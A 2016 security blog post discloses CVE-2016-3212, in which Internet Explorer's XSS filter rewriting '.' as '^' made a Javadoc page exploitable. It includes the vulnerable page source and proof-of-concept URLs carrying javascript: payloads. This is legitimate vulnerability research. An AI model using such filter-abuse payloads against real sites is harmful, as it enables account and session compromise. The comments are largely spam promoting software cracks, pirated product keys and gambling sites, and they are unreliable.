Friday, July 15, 2016

Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)

In the past, I talked about XSS attacks exploiting IE XSS filter in CODE BLUE, which is an information security conference in Japan. A similar bug is fixed in June patch as CVE-2016-3212.
So, in this post, I would like to explain details of this bug.

As described in my slides, applying the XSS filter rules to an irrelevant context, we can do XSS attacks using the filter behavior replacing the . with the # even if the page does not have an XSS bug.




To prevent such attacks, Microsoft changed the filter behavior by December 2015 patch. After this patch, the ^ is used as the replacement character of the . instead of the #. Indeed, this can prevent attacks above. But it brought another nightmare. After several months, I confirmed an XSS using this behavior in Google's domain, and I got $3133.7 as rewards through Google VRP.

Google sets X-XSS-Protection: 1;mode=block header in almost their services. But not all. So, I checked carefully some pages which have no mode=block. As a result, I discovered that the vulnerable page exists in Javadoc on cloud.google.com.

I put the approximate copy:

http://vulnerabledoma.in/xxn/xss_javadoc.html

This page becomes vulnerable to XSS when one . is replaced with the ^ by the XSS filter.
Can you find where it is?

The answer is the . of the yellow part:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<title>javadoc</title>
<script type="text/javascript">
    targetPage = "" + window.location.search;
    if (targetPage != "" && targetPage != "undefined")
targetPage = targetPage.substring(1);
if (targetPage.indexOf(":") != -1 || (targetPage != "" && !validURL(targetPage)))
        targetPage = "undefined";
    function validURL(url) {
        try {
            url = decodeURIComponent(url);
        }
        catch (error) {
            return false;
        }
        var pos = url.indexOf(".html");
        if (pos == -1 || pos != url.length - 5)
            return false;
        var allowNumber = false;
        var allowSep = false;
        var seenDot = false;
        for (var i = 0; i < url.length - 5; i++) {
            var ch = url.charAt(i);
            if ('a' <= ch && ch <= 'z' ||
                    'A' <= ch && ch <= 'Z' ||
                    ch == '$' ||
                    ch == '_' ||
                    ch.charCodeAt(0) > 127) {
                allowNumber = true;
                allowSep = true;
            } else if ('0' <= ch && ch <= '9'
                    || ch == '-') {
                if (!allowNumber)
                     return false;
            } else if (ch == '/' || ch == '.') {
                if (!allowSep)
                    return false;
                allowNumber = false;
                allowSep = false;
                if (ch == '.')
                     seenDot = true;
                if (ch == '/' && seenDot)
                     return false;
            } else {
                return false;
            }
        }
        return true;
    }
    function loadFrames() {
        if (targetPage != "" && targetPage != "undefined")
             top.classFrame.location = top.targetPage;
    }
</script>
</head>
<frameset cols="20%,80%" title="Documentation frame" onload="top.loadFrames()">
<frameset rows="30%,70%" title="Left frames" onload="top.loadFrames()">
<frame src="/" name="packageListFrame" title="All Packages">
<frame src="/" name="packageFrame" title="All classes and interfaces (except non-static nested types)">
</frameset>
<frame src="/" name="classFrame" title="Package, class and interface descriptions" scrolling="yes">
<noframes>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<h2>Frame Alert</h2>
<p>This document is designed to be viewed using the frames feature. If you see this message, you are using a non-frame-capable web client. Link to <a href="overview-summary.html">Non-frame version</a>.</p>
</noframes>
</frameset>
</html>
In the <script>, it checks whether the given string via location.search is safe.
For example, the following unsafe URL is blocked:

http://vulnerabledoma.in/xxn/xss_javadoc.html?javascript:alert(1)

Then, what will happen when the . of the yellow part is replaced with the ^?

Let's actually try it. If you put the following strings in the target URL, the page content is forcibly matched to XSS filter rules, and we can replace the aimed . with the ^:



You can reproduce this bug from the following URL using IE/Edge which does not have June 2016 patch:

http://vulnerabledoma.in/xxn/xss_javadoc.html?javascript:alert(1)//"++++++++++++.i+++=

Also I put the replaced page for you who already applied the patch. You can confirm same behavior:

http://vulnerabledoma.in/xxn/xss_javadoc2.html?javascript:alert(document.domain)

A crucial difference from # and ^, the # is not the operator in JavaScript, but the ^ is the operator. For example, if the a.b; is in the page and it is replaced with # and ^, a#b; is the syntax error but a^b; is valid syntax. It brings an XSS bug.




After June 2016 patch, when the XSS filter replaces the ., the mode=block behavior is enforced even if the page does not have X-XSS-Protection header.

I was surprised and disgusted when the ^ is displayed but anyway it has finally calmed down!

Also, in the recent patch(July 2016), it seems that Microsoft killed almost possibilities of XSS attacks exploiting XSS filter. I will write this details in next post :)

Thanks!

34 comments:

  1. I am glad that I saw this post. It is informative blog for us and we need this type of blog thanks for share this blog, Keep posting such instructional blogs and I am looking forward for your future posts.
    Cyber Security Projects for Final Year

    JavaScript Training in Chennai

    Project Centers in Chennai

    JavaScript Training in Chennai

    ReplyDelete
  2. this code is amazing bug.thanks for sharing these information with all of us. Kinemaster Gold

    ReplyDelete
    Replies
    1. Hey, Action lover, do you want to play the most popular action game Nulls Brawl in your mobile, then try this out with unlimited money?

      Delete
  3. 188bet Review: What is the best bet of 2018? | ThTopBet
    188bet is カジノ シークレット a sports betting and betting company which has a 188bet long track record for delivering quality, high-quality betting opportunities for  Rating: 5 planet win 365 · ‎Review by TopBet.com

    ReplyDelete

  4. Thanks for Sharing such an amazing article. Keep working... Your Site is very nice, and it's very helping us.. this post is unique and interesting, thank you for sharing this awesome information Little Snitch Crack

    ReplyDelete
  5. Useful information are very rare nowadays on web. I would like to thank the author who write and share this article with informative and useful information. for More Information Click Here:- Common Printer Problems

    ReplyDelete
  6. Microsoft Office provides a wide range of productivity software products. After obtaining the product key, the user will be able to access all of the features and capabilities supplied by Microsoft by utilising the Microsoft Office 2007 Download.
    Microsoft Office 2007 Crack
    Microsoft Office 2016 Crack
    Microsoft Office 2019 Product Key
    Microsoft Office 2010 Product Key
    microsoft office 2011 crack product key

    ReplyDelete
  7. I am greatly thankful to the owner of this website to share this valuable information.Download Now

    ReplyDelete
  8. I appreciate you sharing your vast expertise with the rest of us. It's better if you generate a lot.
    Click HERE

    ReplyDelete
  9. Decent data. I've bookmarked your site, and I'm adding your RSS channels to my Google record to get refreshes in a flash.
    mirillis action crack
    dll files fixer crack

    ReplyDelete
  10. Hey, Good job i read your article thanks for sharing it I really appreciate your work visit my website
    Crackslite
    Studio One Pro Crack
    Beyond Compare Crack

    ReplyDelete
  11. This is a fantastic site! Also, your website loads rapidly!
    https://licenselive.com/eset-nod32-antivirus-crack/

    ReplyDelete
  12. This is a great article.
    https://licenselive.com/traystatus-pro-crack/

    ReplyDelete
  13. เว็บ 123 A collection of popular casino games around the world. Guaranteed fun and complete service

    ReplyDelete
  14. คาสิโนออนไลน์ Available 24 hours a day, no matter where you are, you can play games anytime, anywhere. Just add Line @123MAXX

    ReplyDelete
  15. Excellent post it is full of knowledge and inspiring help with assignment writing uk content good work. Keep it up.

    ReplyDelete
  16. You must try out the best video editor Kinemaster Pro MOD Apk premium unlocked version for Android.

    ReplyDelete
  17. igoal88 เครดิตฟรี gambling website that combines games and online betting no minimum bet

    ReplyDelete
  18. Want to have money to spend? Come here. web number1 123 slot

    ReplyDelete
  19. Some truly quality articles on this website , bookmarked . 바카라사이트


    ReplyDelete
  20. igoal88 withdraw, no minimum 1 baht, you can make transactions, no need to make a turn

    ReplyDelete
  21. ufo99Betting sites do not have to go anywhere. Here, one stop

    ReplyDelete
  22. ราคาบอล Recommend the best gambling website in them, this is really easy to play.

    ReplyDelete
  23. igoal88 is a closed game camp to update very often and every time that it has closed for renovations

    ReplyDelete
  24. Turn your online channel into income bonuses all the time so you don't get bored..Click>> เว็บ พนัน 123

    ReplyDelete